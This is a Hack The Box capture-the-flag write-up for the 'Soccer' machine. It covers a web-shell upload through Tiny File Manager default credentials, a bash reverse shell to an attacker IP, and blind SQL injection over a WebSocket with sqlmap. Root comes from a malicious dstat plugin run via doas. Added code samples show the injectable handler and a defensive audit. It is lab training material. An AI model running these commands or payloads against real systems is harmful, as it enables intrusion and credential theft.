Soccer-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: directory scanning, Tiny File Manager default credentials, Tiny File Manager arbitrary file upload, process analysis and DNS/hosts binding, WebSocket SQL injection, SUID privilege escalation, doas privilege escalation

Reference: https://0xdf.gitlab.io/2023/06/10/htb-soccer.html

0x01 Obtaining user access

1. Get the target machine's IP address: 10.10.11.194

2. Enumerate the open ports:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.194 -oG allports -Pn
[sudo] kali 的密码:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 07:11 CST
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
RTTVAR has grown to over 2.3 seconds, decreasing to 2.0
Nmap scan report for 10.10.11.194
Host is up (7.8s latency).
Not shown: 53470 filtered tcp ports (no-response), 12063 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http

Nmap done: 1 IP address (1 host up) scanned in 76.17 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p22,80 --min-rate=10000 10.10.11.194 -Pn -sC -sV
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-20 07:13 CST
Nmap scan report for 10.10.11.194
Host is up (0.12s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 ad:0d:84:a3:fd:cc:98:a4:78:fe:f9:49:15:da:e1:6d (RSA)
| 256 df:d6:a3:9f:68:26:9d:fc:7c:6a:0c:29:e9:61:f0:0c (ECDSA)
|_ 256 57:97:56:5d:ef:79:3c:2f:cb:db:35:ff:f1:7c:61:5c (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.72 seconds

3. Add the discovered domain name to the hosts file

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.194 soccer.htb" | sudo tee -a /etc/hosts
10.10.11.194 soccer.htb

4. Fingerprint the web service with whatweb and take a look at the site

┌──(kali㉿offsec)-[~/Desktop]
└─$ whatweb http://soccer.htb/
http://soccer.htb/ [200 OK] Bootstrap[4.1.1], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.10.11.194], JQuery[3.2.1,3.6.0], Script, Title[Soccer - Index], X-UA-Compatible[IE=edge], nginx[1.18.0]

http://soccer.htb/

5. Nothing notable so far, so brute-force directories

┌──(kali㉿offsec)-[~/Desktop]
└─$ ffuf -u http://soccer.htb/FUZZ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt

v2.1.0-dev
________________________________________________

:: Method : GET
:: URL : http://soccer.htb/FUZZ
:: Wordlist : FUZZ: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 450ms]
# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 453ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 528ms]
# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 565ms]
# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 569ms]
# directory-list-2.3-small.txt [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 631ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 672ms]
# Copyright 2007 James Fisher [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 620ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 660ms]
# on at least 3 different hosts [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 664ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 711ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 721ms]
# [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 476ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 510ms]
tiny [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 863ms]
[Status: 200, Size: 6917, Words: 2196, Lines: 148, Duration: 357ms]
[WARN] Caught keyboard interrupt (Ctrl-C)

6. A directory was found; let's look at that page

http://soccer.htb/tiny/

view-source:http://soccer.htb/tiny/

data-version="2.4.3"

7. The page source reveals the CMS version number; next, look up known vulnerabilities for this CMS

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit Tiny File Manager
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulnerabi | php/webapps/36364.txt
Manx 1.0.1 - '/admin/tiny_mce/plugins/ajaxfilemanager_OLD/ajax_get_file_listing.php' Multiple Cross-Site Scripting Vulne | php/webapps/36365.txt
MCFileManager Plugin for TinyMCE 3.2.2.3 - Arbitrary File Upload | php/webapps/15768.txt
Tiny File Manager 2.4.6 - Remote Code Execution (RCE) | php/webapps/50828.sh
TinyMCE MCFileManager 2.1.2 - Arbitrary File Upload | php/webapps/15194.txt
------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -x 50828
Exploit: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/50828
Path: /usr/share/exploitdb/exploits/php/webapps/50828.sh
Codes: CVE-2021-45010, CVE-2021-40964
Verified: False
File Type: Unicode text, UTF-8 text

┌──(kali㉿offsec)-[~/Desktop]
└─$ searchsploit -m 50828
Exploit: Tiny File Manager 2.4.6 - Remote Code Execution (RCE)
URL: https://www.exploit-db.com/exploits/50828
Path: /usr/share/exploitdb/exploits/php/webapps/50828.sh
Codes: CVE-2021-45010, CVE-2021-40964
Verified: False
File Type: Unicode text, UTF-8 text
Copied to: /home/kali/Desktop/50828.sh

8. The exploit reveals the default credentials; after logging in, following the exploit's approach, we can upload a web shell

admin admin@123
http://soccer.htb/tiny/tinyfilemanager.php?p=
https://github.com/febinrev/tinyfilemanager-2.4.3-exploit/

http://soccer.htb/tiny/uploads/qsd-php-backdoor.php?f=/var/www/html//tiny/tinyfilemanager.php

'admin' => '$2y$10$/K.hjNr84lLNDt8fTXjoI.DBp6PpeyoJ.mGwrrLuCZfAwfSAGqhOW', //admin@123
'user' => '$2y$10$Fg6Dz8oH9fPoZ2jJan5tZuv6Z4Kp7avtQ9bDfrdRntXtPeiMAZyGO' //12345

9. Note that the upload is performed automatically by asynchronous JavaScript, so you have to wait until the page has finished loading its JS, otherwise the file will not upload. The uploads directory is also cleaned up periodically, so the shell has to be triggered promptly.

http://soccer.htb/tiny/uploads/qsd-php-backdoor.php

bash -c "bash -i >& /dev/tcp/10.10.16.7/443 0>&1"

┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.194] 45436
bash: cannot set terminal process group (1051): Inappropriate ioctl for device
bash: no job control in this shell
www-data@soccer:~/html/tiny/uploads$

www-data@soccer:~/html/tiny/uploads$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@soccer:~/html/tiny/uploads$ ls -la /home
ls -la /home
total 12
drwxr-xr-x 3 root root 4096 Nov 17 2022 .
drwxr-xr-x 21 root root 4096 Dec 1 2022 ..
drwxr-xr-x 3 player player 4096 Nov 28 2022 player
www-data@soccer:~/html/tiny/uploads$

10. At this point we have an initial shell; next comes routine enumeration

www-data@soccer:/home/player$ ss -ltn
ss -ltn
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
LISTEN 0 151 127.0.0.1:3306 0.0.0.0:*
LISTEN 0 511 0.0.0.0:80 0.0.0.0:*
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:*
LISTEN 0 128 0.0.0.0:22 0.0.0.0:*
LISTEN 0 511 127.0.0.1:3000 0.0.0.0:*
LISTEN 0 511 0.0.0.0:9091 0.0.0.0:*
LISTEN 0 70 127.0.0.1:33060 0.0.0.0:*
LISTEN 0 511 [::]:80 [::]:*
LISTEN 0 128 [::]:22 [::]:*



Hostname, hosts and DNS


127.0.0.1 localhost soccer soccer.htb soc-player.soccer.htb

127.0.1.1 ubuntu-focal ubuntu-focal


╔══════════╣ Active Ports
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#open-ports
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN 1111/nginx: worker
tcp 0 0 127.0.0.53:53 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3000 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:9091 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:33060 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN 1111/nginx: worker
tcp6 0 0 :::22 :::* LISTEN -

11. Enumeration shows that the system hosts another subdomain; add it to the hosts file and visit it

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.194 soc-player.soccer.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.11.194 soc-player.soccer.htb

http://soc-player.soccer.htb/

drwxr-xr-x 2 root root 4096 Dec 1 2022 /etc/nginx/sites-enabled
lrwxrwxrwx 1 root root 41 Nov 17 2022 /etc/nginx/sites-enabled/soc-player.htb -> /etc/nginx/sites-available/soc-player.htb
server {
listen 80;
listen [::]:80;
server_name soc-player.soccer.htb;
root /root/app/views;
location / {
proxy_pass http://localhost:3000;
proxy_http_version 1.1;
proxy_set_header Upgrade $http_upgrade;
proxy_set_header Connection 'upgrade';
proxy_set_header Host $host;
proxy_cache_bypass $http_upgrade;
}
}

12. Free tickets when you sign up / log in

http://soc-player.soccer.htb/signup

shiyan@qq.com
shiyan
shiyan

http://soc-player.soccer.htb/check

http://soc-player.soccer.htb/match

13. The source of the page shown after login contains some useful information

view-source:http://soc-player.soccer.htb/check

ws://soc-player.soccer.htb:9091

14. Putting the clues together, this should be the application's WebSocket endpoint; verify it with a third-party Python library

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 -m websockets ws://soc-player.soccer.htb:9091/
Connected to ws://soc-player.soccer.htb:9091/.
> help
< Ticket Doesn't Exist
> {"id":"1"}
< Ticket Doesn't Exist
> {"id":"58040"}
< Ticket Doesn't Exist
> eit
< Ticket Doesn't Exist
> exit
< Ticket Doesn't Exist
> exit()
< Ticket Doesn't Exist
Connection closed: 1000 (OK).

15. sqlmap can target WebSockets directly, so it is an easy way to dump data from the vulnerable endpoint. Try different --level and --risk flags.

https://cloud.tencent.com/developer/article/1867137

┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3


sqlmap identified the following injection point(s) with a total of 394 HTTP(s) requests:
---
Parameter: JSON id ((custom) POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: {"id":"-4486 OR 5386=5386"}

Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: {"id":"1 AND (SELECT 3020 FROM (SELECT(SLEEP(5)))XyhF)"}
---
[07:25:35] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 --dbs

available databases [5]:
[*] information_schema
[*] mysql
[*] performance_schema
[*] soccer_db
[*] sys


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" --tables

Database: soccer_db
[1 table]
+----------+
| accounts |
+----------+


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" -T "accounts" --columns

Database: soccer_db
Table: accounts
[4 columns]
+----------+-------------+
| Column | Type |
+----------+-------------+
| email | varchar(40) |
| id | int |
| password | varchar(40) |
| username | varchar(40) |
+----------+-------------+


┌──(kali㉿offsec)-[~/Desktop]
└─$ sqlmap --url "ws://soc-player.soccer.htb:9091/" --data='{"id":"1"}' --level 5 --risk 3 -D "soccer_db" -T "accounts" -C email,username,password --dump

Database: soccer_db
Table: accounts
[1 entry]
+-------------------+----------+----------------------+
| email | username | password |
+-------------------+----------+----------------------+
| player@player.htb | player | PlayerOftheMatch2022 |
+-------------------+----------+----------------------+
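As an added illustration (not code from the write-up or from the box), here is a constructed stand-in for the ticket-check handler behind ws://soc-player.soccer.htb:9091, first in the injectable form that gives sqlmap its boolean oracle and then with strict validation and a bound parameter. The table name, column and SQL text are assumptions; the page only shows the "Ticket Doesn't Exist" replies and the two payloads sqlmap reported.

```python
import json
import re
import sqlite3

# Constructed stand-in for the soc-player ticket check (added example, not the
# box's real source): the page only shows that ws://soc-player.soccer.htb:9091
# answers "Ticket Doesn't Exist" for unknown ids and that the JSON `id` field is
# injectable. Table name, column and the SQL below are assumptions.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE tickets (id INTEGER PRIMARY KEY, owner TEXT)")
    conn.execute("INSERT INTO tickets VALUES (1001, 'player')")  # constructed row
    return conn

def check_ticket_vulnerable(conn, message):
    """Interpolates the untrusted id straight into SQL: the bug sqlmap found.
    '{"id":"-4486 OR 5386=5386"}' becomes WHERE id = -4486 OR 5386=5386, which
    matches every row, so the reply flips to 'Ticket Exists': a boolean oracle."""
    try:
        ticket_id = json.loads(message)["id"]
        row = conn.execute(f"SELECT id FROM tickets WHERE id = {ticket_id}").fetchone()
    except (ValueError, KeyError, TypeError, sqlite3.Error):
        return "Ticket Doesn't Exist"   # bad JSON or broken SQL both look like "no ticket"
    return "Ticket Exists" if row else "Ticket Doesn't Exist"

def parse_ticket_id(message):
    """Return the id as int only if the message is a JSON object whose id is a
    non-negative integer or a string of ASCII digits; None for everything else."""
    try:
        payload = json.loads(message)
    except ValueError:
        return None
    if not isinstance(payload, dict):
        return None
    raw = payload.get("id")
    if isinstance(raw, int) and not isinstance(raw, bool) and raw >= 0:
        return raw
    if isinstance(raw, str) and re.fullmatch(r"[0-9]{1,10}", raw):
        return int(raw)
    return None

def check_ticket_hardened(conn, message):
    """Same lookup with strict type validation and a bound parameter."""
    ticket_id = parse_ticket_id(message)
    if ticket_id is None:
        return "Ticket Doesn't Exist"
    row = conn.execute("SELECT id FROM tickets WHERE id = ?", (ticket_id,)).fetchone()
    return "Ticket Exists" if row else "Ticket Doesn't Exist"
```

Rejected ids from parse_ticket_id are also the natural thing to log at the WebSocket server, since a burst of non-numeric ids is exactly what a sqlmap run against this endpoint looks like.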

16. We now have a user's credentials; try logging in

┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh player@10.10.11.194
The authenticity of host '10.10.11.194 (10.10.11.194)' can't be established.
ED25519 key fingerprint is SHA256:PxRZkGxbqpmtATcgie2b7E8Sj3pw1L5jMEqe77Ob3FE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.194' (ED25519) to the list of known hosts.
player@10.10.11.194's password:
Welcome to Ubuntu 20.04.5 LTS (GNU/Linux 5.4.0-135-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sat Apr 20 16:04:43 UTC 2024

System load: 0.0 Processes: 230
Usage of /: 70.2% of 3.84GB Users logged in: 0
Memory usage: 25% IPv4 address for eth0: 10.10.11.194
Swap usage: 0%

* Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s
just raised the bar for easy, resilient and secure K8s cluster deployment.

https://ubuntu.com/engage/secure-kubernetes-at-the-edge

0 updates can be applied immediately.


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Tue Dec 13 07:29:10 2022 from 10.10.14.19
player@soccer:~$ is
is: command not found
player@soccer:~$ id&hostname&ifconfig
[1] 22638
[2] 22639
soccer
uid=1001(player) gid=1001(player) groups=1001(player)
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.11.194 netmask 255.255.254.0 broadcast 10.10.11.255
inet6 fe80::250:56ff:feb9:e2cc prefixlen 64 scopeid 0x20<link>
ether 00:50:56:b9:e2:cc txqueuelen 1000 (Ethernet)
RX packets 81324 bytes 13228566 (13.2 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 82457 bytes 31239694 (31.2 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 476010 bytes 55321617 (55.3 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 476010 bytes 55321617 (55.3 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0

[1]- Done id
[2]+ Done hostname
player@soccer:~$

17. Grab the first flag

player@soccer:~$ ls -la
total 28
drwxr-xr-x 3 player player 4096 Nov 28 2022 .
drwxr-xr-x 3 root root 4096 Nov 17 2022 ..
lrwxrwxrwx 1 root root 9 Nov 17 2022 .bash_history -> /dev/null
-rw-r--r-- 1 player player 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 player player 3771 Feb 25 2020 .bashrc
drwx------ 2 player player 4096 Nov 17 2022 .cache
-rw-r--r-- 1 player player 807 Feb 25 2020 .profile
lrwxrwxrwx 1 root root 9 Nov 17 2022 .viminfo -> /dev/null
-rw-r----- 1 root player 33 Apr 20 13:46 user.txt
player@soccer:~$ cat user.txt
e5f77482f14275f0275ba9294d82bfe4
player@soccer:~$

0x02 Obtaining root access

18. Enumerate possible privilege escalation vectors

player@soccer:~$ sudo -l
[sudo] password for player:
Sorry, user player may not run sudo on localhost.
player@soccer:~$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/doas
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/bin/umount
/usr/bin/fusermount
/usr/bin/mount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/at
/snap/snapd/17883/usr/lib/snapd/snap-confine
/snap/core20/1695/usr/bin/chfn
/snap/core20/1695/usr/bin/chsh
/snap/core20/1695/usr/bin/gpasswd
/snap/core20/1695/usr/bin/mount
/snap/core20/1695/usr/bin/newgrp
/snap/core20/1695/usr/bin/passwd
/snap/core20/1695/usr/bin/su
/snap/core20/1695/usr/bin/sudo
/snap/core20/1695/usr/bin/umount
/snap/core20/1695/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core20/1695/usr/lib/openssh/ssh-keysign
player@soccer:~$
player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
player@soccer:~$

19. doas is the sudo alternative commonly found on OpenBSD, but it can also be installed on Debian-based Linux distributions such as Ubuntu. I don't see a doas.conf file in /etc, so I'll search the filesystem for it with find:

player@soccer:~$ ls -la /usr/local/bin/doas
-rwsr-xr-x 1 root root 42224 Nov 17 2022 /usr/local/bin/doas
player@soccer:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
player@soccer:~$ cat /usr/local/etc/doas.conf
permit nopass player as root cmd /usr/bin/dstat
player@soccer:~$

20. dstat is a tool for collecting system statistics. Looking at its man page, there is a section about plugins that says:

player@soccer:~$ echo -e 'import os\n\nos.system("/bin/bash")' > /usr/local/share/dstat/dstat_shiyan.py
player@soccer:~$ doas /usr/bin/dstat --shiyan
/usr/bin/dstat:2619: DeprecationWarning: the imp module is deprecated in favour of importlib; see the module's documentation for alternative uses
import imp
root@soccer:/home/player# id
uid=0(root) gid=0(root) groups=0(root)
root@soccer:/home/player#
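As an added example (not from the write-up), a small audit that parses doas.conf rules like the one found at /usr/local/etc/doas.conf and flags a root-level dstat rule whenever one of dstat's plugin directories is group- or world-writable, which is the combination that turned a monitoring tool into a root shell above. The plugin directory list beyond /usr/local/share/dstat/ is an assumption about dstat's default search path.

```python
import os
import shlex
import stat
import tempfile

# Added audit helper, not part of the write-up. Plugin dirs are an assumption
# from dstat's default search path; the page itself shows only /usr/local/share/dstat/.
DSTAT_PLUGIN_DIRS = ("/usr/share/dstat", "/usr/local/share/dstat")

def parse_doas_rule(line):
    """Parse one doas.conf rule (without setenv groups) into a dict; None for blanks/comments."""
    tokens = shlex.split(line.split("#", 1)[0])
    if not tokens or tokens[0] not in ("permit", "deny"):
        return None
    rule = {"action": tokens[0], "options": [], "identity": None, "target": None, "cmd": None}
    i = 1
    while i < len(tokens) and tokens[i] in ("nopass", "nolog", "persist", "keepenv"):
        rule["options"].append(tokens[i])
        i += 1
    if i >= len(tokens):
        return None                      # rule has no identity: malformed
    rule["identity"], i = tokens[i], i + 1
    if i + 1 < len(tokens) and tokens[i] == "as":
        rule["target"], i = tokens[i + 1], i + 2
    if i + 1 < len(tokens) and tokens[i] == "cmd":
        rule["cmd"] = tokens[i + 1]
    return rule

def loosely_writable(path):
    """True if path exists and its mode bits grant write to group or others."""
    return os.path.exists(path) and bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def risky_dstat_rules(conf_text, plugin_dirs=DSTAT_PLUGIN_DIRS):
    """(rule, dir) pairs: permit rules running dstat as root (doas defaults to root
    when 'as' is absent) where a non-root user could drop a plugin into dir."""
    findings = []
    for line in conf_text.splitlines():
        rule = parse_doas_rule(line)
        if not rule or rule["action"] != "permit" or not rule["cmd"]:
            continue
        if rule["target"] not in (None, "root") or os.path.basename(rule["cmd"]) != "dstat":
            continue
        findings.extend((rule, d) for d in plugin_dirs if loosely_writable(d))
    return findings

def self_check():
    """Runs the audit on the box's rule against two constructed temp dirs (0755 and 0777)."""
    conf = "permit nopass player as root cmd /usr/bin/dstat\n"
    safe, loose = tempfile.mkdtemp(), tempfile.mkdtemp()
    try:
        os.chmod(safe, 0o755)
        os.chmod(loose, 0o777)
        return [d for _, d in risky_dstat_rules(conf, (safe, loose))], loose
    finally:
        os.rmdir(safe)
        os.rmdir(loose)
```

The fix on the defender's side is either to tighten the directory permissions so only root can add plugins, or to drop the rule; a nopass rule for any program that loads code from user-writable paths is equivalent to `permit nopass player as root`.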

21. Grab the final flag

root@soccer:/home/player# cat /root/root.txt
6f5e6092991692e12338d2858bfb1d24
root@soccer:/home/player#

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/519


Soccer-htb-writeup
https://sh1yan.top/2024/04/20/Soccer-htb-writeup/
Author: shiyan
Published: April 20, 2024